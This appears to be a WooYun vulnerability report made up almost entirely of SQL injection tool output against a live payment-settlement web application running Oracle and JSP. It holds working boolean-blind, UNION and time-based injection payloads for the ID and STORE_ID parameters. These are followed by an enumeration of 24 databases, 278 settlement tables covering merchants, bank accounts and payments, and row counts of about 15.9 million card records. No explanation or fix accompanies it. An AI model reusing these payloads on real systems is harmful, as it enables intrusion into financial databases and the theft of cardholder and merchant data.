WooYun.org

---
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=4&ID=540055' AND 1957=1957 AND 'AQSu'='AQSu
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: action=4&ID=540055' UNION ALL SELECT CHR(113)||CHR(103)||CHR(102)||CHR(115)||CHR(113)||CHR(78)||CHR(117)||CHR(70)||CHR(102)||CHR(110)||CHR(98)||CHR(105)||CHR(108)||CHR(100)||CHR(106)||CHR(113)||CHR(111)||CHR(122)||CHR(122)||CHR(113),NULL FROM DUAL-- 
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] BILL
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] IGNITE_M
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZHXBK
[*] ZHXBK1
[*] ZHXDB_SETTLE
[*] ZHXDB_SETTLE_BANK
---
Place: GET
Parameter: STORE_ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=info&STORE_ID=4000105444100022' AND 6214=6214 AND 'mamy'='mamy
    Type: UNION query
    Title: Generic UNION query (NULL) - 20 columns
    Payload: method=info&STORE_ID=-9947' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(108)||CHR(114)||CHR(120)||CHR(113)||CHR(113)||CHR(72)||CHR(111)||CHR(101)||CHR(82)||CHR(98)||CHR(71)||CHR(86)||CHR(77)||CHR(65)||CHR(113)||CHR(105)||CHR(97)||CHR(105)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- 
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: method=info&STORE_ID=4000105444100022' AND 2158=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'OrDw'='OrDw
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
Database: ZHXDB_SETTLE
[278 tables]
+-------------------------------+
| ACC_CARDTYPE_MARKET_BAK       |
| AQUA_EXPLAIN_110408           |
| AQUA_EXPLAIN_115312           |
| CREATE_MERCH_TEMP             |
| ETL_TRANS_DEF                 |
| FENGHUANGHUI                  |
| MOBILE_SEARCH_CARD_LOG        |
| MOBILE_VISIT_LOG              |
| STARBUCKS                     |
| STARBUCKS_TMP                 |
| STA_VIP_ACCCARDTYPE           |
| STA_VIP_ACCCARDTYPEMARKET     |
| STA_VIP_ACCHANDPAYLOG         |
| STA_VIP_ACCMARKETFILE         |
| STA_VIP_ACCMARKETFILEHANDFEE  |
| STA_VIP_ACCPOSFILE            |
| STA_VIP_ACCSIGNCOMPANY        |
| STA_VIP_ACCVALIDCARD          |
| STA_VIP_ACCWASTEBOOK          |
| STA_VIP_ACTICARD              |
| STA_VIP_ACTIMERCHANT          |
| STA_VIP_ACTIMERCHANTTERMINAL  |
| STA_VIP_ACTIPLAN              |
| STA_VIP_ACTIROLE              |
| STA_VIP_ACTIROLEDETAIL        |
| STA_VIP_ALLCANCELTABLE        |
| STA_VIP_CARDTYPE              |
| STA_VIP_CARDTYPEMARKET        |
| STA_VIP_JIFENACCUMWASTEBOOK   |
| STA_VIP_MARKETFILE            |
| STA_VIP_POSFILE               |
| STA_VIP_STRIKELOG             |
| STA_VIP_VALIDCARD             |
| STA_VIP_WASTEBOOK             |
| STA_XSHQ_WASTEBOOK            |
| STA_XSH_WASTEBOOK             |
| STL_BATCHDETAIL               |
| STL_BATCHDETAIL_CP            |
| STL_BATCHDETAIL_SAMSUNG       |
| STL_DEFFTHAN_CPL              |
| STL_DEFFTHAN_VIP              |
| STL_DEFFTHAN_VIP_HIS          |
| STL_DETAIL_NO_SETTLE_MERCH    |
| STL_SYS_CARDTYPE              |
| STL_SYS_CARDTYPE4MERCHANT     |
| STL_SYS_SETTLECARDCATG        |
| STL_SYS_SETTLECARDTYPE        |
| STL_SYS_SETTLECARDTYPE_SPEC   |
| STL_SYS_TRANS                 |
| STL_SYS_TRANSMESG             |
| STL_VIP_REVERSAL              |
| STL_VIP_TRANS                 |
| STL_VIP_TRANS_HIS             |
| STL_VIP_TRANS_HIS_TEMP        |
| STL_VIP_TRANS_TEMP            |
| ST_ACCOUNT                    |
| ST_ACCOUNT_MERCH              |
| ST_ACC_CARDTYPE_AREA          |
| ST_AE_ETL_1824                |
| ST_AE_ETL_9824                |
| ST_AE_ETL_9825                |
| ST_AE_ETL_ACTPAYMENTINFO      |
| ST_AE_ETL_ARBITRATION         |
| ST_AE_ETL_BATCHDETAIL         |
| ST_AE_ETL_CARDBAL             |
| ST_AE_ETL_CHARGEBACK          |
| ST_AE_ETL_CHARGEBACK_APP      |
| ST_AE_ETL_CHARGE_DETAIL       |
| ST_AE_ETL_CHARGE_THAWINFO     |
| ST_AE_ETL_COLLECT             |
| ST_AE_ETL_COLLECT_DETAIL      |
| ST_AE_ETL_COLLECT_MAIN        |
| ST_AE_ETL_COUNTRY             |
| ST_AE_ETL_CURRENCY            |
| ST_AE_ETL_CUST_CARD           |
| ST_AE_ETL_DATAEXPR            |
| ST_AE_ETL_EXCHANGE_RATE       |
| ST_AE_ETL_FILERETURNS         |
| ST_AE_ETL_MCC_RAL             |
| ST_AE_ETL_PARAM               |
| ST_AE_ETL_PPRDATA             |
| ST_AE_ETL_PPRINFO             |
| ST_AE_ETL_RETURNAMT           |
| ST_AE_ETL_SETTLE_FEE          |
| ST_AE_ETL_STATISTIC           |
| ST_AE_ETL_SYSCB_CLEAR         |
| ST_AE_ETL_SYSCHARGEBACK       |
| ST_AE_ETL_THAWINFO            |
| ST_AE_ETL_TRANS               |
| ST_AE_ETL_TRANS_1110          |
| ST_AE_ETL_TRANS_1240          |
| ST_AE_ETL_TRANS_1644          |
| ST_AE_ETL_TRANS_CANCEL        |
| ST_AE_ETL_TRANS_FEE           |
| ST_AE_ETL_TRANS_MAIN          |
| ST_AE_ETL_TRANS_TJ            |
| ST_AE_ETL_UNFREEZE_LOG        |
| ST_AGENTRECEIPT_MERCHINFO     |
| ST_ANNOUNCE_INFO              |
| ST_APPLICTION_USERS           |
| ST_AREA                       |
| ST_AWARD                      |
| ST_AWARD_UPDATE               |
| ST_BAM_ACCOUNTBALANCE         |
| ST_BAM_BANK_ACCOUNT           |
| ST_BAM_BANK_ACTUALDETAIL      |
| ST_BAM_BANK_CUSTOMERMANAGER   |
| ST_BAM_BANK_INFO              |
| ST_BAM_BANK_PARAM             |
| ST_BATCH_LOG                  |
| ST_BILL                       |
| ST_BILL_PRINT                 |
| ST_BRANCH                     |
| ST_BRANCH_INFO                |
| ST_CANCEL_CONSTRACT           |
| ST_CARD_TYPE                  |
| ST_CHANNEL                    |
| ST_CHINA_BANK                 |
| ST_CLOSE_STORE                |
| ST_COLLECT                    |
| ST_COMPANY                    |
| ST_CONSUMER                   |
| ST_CREATE_MERCH_INFO          |
| ST_CREDIT_PRINT               |
| ST_EXAMINE                    |
| ST_EXAMINE_CHANGE             |
| ST_EXAMINE_CHANGE_BAK         |
| ST_EXAMINE_INFO               |
| ST_EXAMINE_TERM               |
| ST_FIX_ACCOUNT                |
| ST_HEADOFFICE_INFO            |
| ST_HEADOFFICE_MERCH           |
| ST_INVOICE                    |
| ST_INVOICE_COLLECT            |
| ST_INVOICE_INFO               |
| ST_INVOICE_MANAGE             |
| ST_INVOICE_MANAGE2            |
| ST_JKLINFO                    |
| ST_JKL_TRANS                  |
| ST_KAMEN_CARD_PRODUCT_RELA    |
| ST_KAMEN_PRODUCT              |
| ST_KAMEN_RATE_INFO            |
| ST_KAMEN_SETTLE_INFO          |
| ST_MANUAL_REFUND              |
| ST_MCC_NEW                    |
| ST_MCC_NEW_RH_2016            |
| ST_MCC_NEW_RH_TMP             |
| ST_MERCH_ACCOUNT              |
| ST_MERCH_ACTIVATE             |
| ST_MERCH_APP_ID               |
| ST_MERCH_BASIC_INFO           |
| ST_MERCH_CHANGE               |
| ST_MERCH_LOCK                 |
| ST_MERCH_PAYMENT              |
| ST_MERCH_PAYMENT_HIS          |
| ST_MERCH_PAYMENT_LOG          |
| ST_MERCH_PICTURE              |
| ST_MERCH_PREPAYMENT           |
| ST_MERCH_PREPAYMENT_STATISTIC |
| ST_MERCH_PRINT                |
| ST_MERCH_TERM_REQ             |
| ST_MOBILE_FEE                 |
| ST_NETWORKPAY                 |
| ST_NT_BANK_ACTUALDETAIL       |
| ST_NT_BANK_FEE                |
| ST_NT_BANK_INFO               |
| ST_NT_BANK_RECEIVECOLLECT     |
| ST_NT_BANK_RECEIVE_STATISTIC  |
| ST_NT_ETL_BATCHDETAIL         |
| ST_NT_ETL_BATCHDETAIL_ERROR   |
| ST_NT_ETL_BATCHDETAIL_MAIN    |
| ST_NT_ETL_BATCHDETAIL_NORATE  |
| ST_NT_ETL_DZ_BCM_SOA          |
| ST_NT_ETL_DZ_CMB_SOA          |
| ST_NT_ETL_DZ_ICBC_HIST        |
| ST_NT_ETL_DZ_ICBC_TDAY        |
| ST_NT_ETL_DZ_SPDB_SOA         |
| ST_NT_ETL_TRANS_BANK          |
| ST_NT_ETL_TRANS_MAIN          |
| ST_PAY                        |
| ST_PAYABLE_MESSAGE            |
| ST_PAY_AUTOBAK                |
| ST_PAY_AUTOBAK_BAK            |
| ST_PAY_BAK                    |
| ST_PAY_CARDTYPE_41            |
| ST_PAY_DETAIL                 |
| ST_PAY_DETAIL08               |
| ST_PAY_DETAIL_TEST            |
| ST_PAY_DETAIL_TMP             |
| ST_PAY_TMP                    |
| ST_POWER                      |
| ST_PROC_LOG                   |
| ST_RATE                       |
| ST_RATE_AMT                   |
| ST_RATE_CHANGE                |
| ST_ROLE                       |
| ST_ROLE_CONSUMER              |
| ST_ROLE_POWER                 |
| ST_ROLE_SETTLE                |
| ST_RUN_LOG                    |
| ST_SETTLE_LIST_BATCH          |
| ST_SETTLE_LIST_DAY            |
| ST_SETTLE_LIST_NORATE         |
| ST_SETTLE_MESSAGE             |
| ST_SETTLE_NEWLIST             |
| ST_SETTLE_NEWLIST_TMP         |
| ST_SETTLE_NEWLIST_TMP1        |
| ST_SETTLE_NEWLIST_TMP2        |
| ST_SETTLE_NEWLIST_TMP3        |
| ST_STORE_CLOSE                |
| ST_SUM_CARDDAY                |
| ST_SUM_CARDDAY_TMP            |
| ST_SUM_CARDDAY_VIEW           |
| ST_SUM_CARDDAY_VIEW_PAY       |
| ST_SUM_CARDDAY_VIEW_TEMP1     |
| ST_SUNING_INFO                |
| ST_TERM                       |
| ST_TERM_AUDITFLAG             |
| ST_TERM_AUDITFLAG_HRS         |
| ST_TERM_AUDITINFO             |
| ST_TERM_CHANGE                |
| ST_TERM_CLASS                 |
| ST_TERM_COMP                  |
| ST_TERM_MODIFY                |
| ST_TERM_YUMINFO               |
| ST_TERM_ZHONGBAI              |
| ST_TON_HLP                    |
| ST_XBK_SETTLE_DATE            |
| ST_YUM_ERROR_INFO             |
| ST_YUM_SETTLE_INFO            |
| T1                            |
| TEST1                         |
| TEST2                         |
| TEST3                         |
| TEST4                         |
| TEST_GGS_FOR_DADING           |
| TEST_MDPOS                    |
| TEST_ZH                       |
| TMP_RUN_LOG                   |
| WEB_ACTIVITY                  |
| WEB_ACTIVITY_STORE            |
| WEB_ADVISE                    |
| WEB_AWARD                     |
| WEB_BANK                      |
| WEB_BANNER                    |
| WEB_CHANGE_USER               |
| WEB_COMPANY_CITY              |
| WEB_DISCOUNT                  |
| WEB_GROUP                     |
| WEB_ISSUE_ACTIVITY            |
| WEB_ISSUE_AWARD               |
| WEB_ISSUE_BANNER              |
| WEB_ISSUE_DISCOUNT            |
| WEB_ISSUE_LOGO                |
| WEB_ISSUE_NOTICE              |
| WEB_ISSUE_STORE               |
| WEB_ISSUE_STORE_20140928      |
| WEB_LABEL                     |
| WEB_LABEL_MCC                 |
| WEB_LOGO                      |
| WEB_LOGO_STORE                |
| WEB_MCC                       |
| WEB_MERCH                     |
| WEB_MERCH_SITE                |
| WEB_NEWS                      |
| WEB_NOTICE                    |
| WEB_NOTICE_STORE              |
| WEB_POSITION                  |
| WEB_SENSITIVE                 |
| WEB_SITE                      |
| WEB_SITE_BANK                 |
| WEB_STORE                     |
| WEB_STORE_20140928            |
| WEB_STORE_LABEL               |
| WEB_WORD_LOG                  |
| WEM_TMP                       |
| WEM_TMP2                      |
| YUM_20150506                  |
+-------------------------------+
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
Database: ZHXBK
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| ACC_CARD_BANK    | 15945274 |
| ACC_VALID_CARD   | 15945272 |
| ACC_CARD_SQL_LOG | 3880    |
| USER_TABEL       | 2       |
| ACC_CARD_TYPE    | 1       |
| EDITION_FILE     | 1       |
+------------------+---------+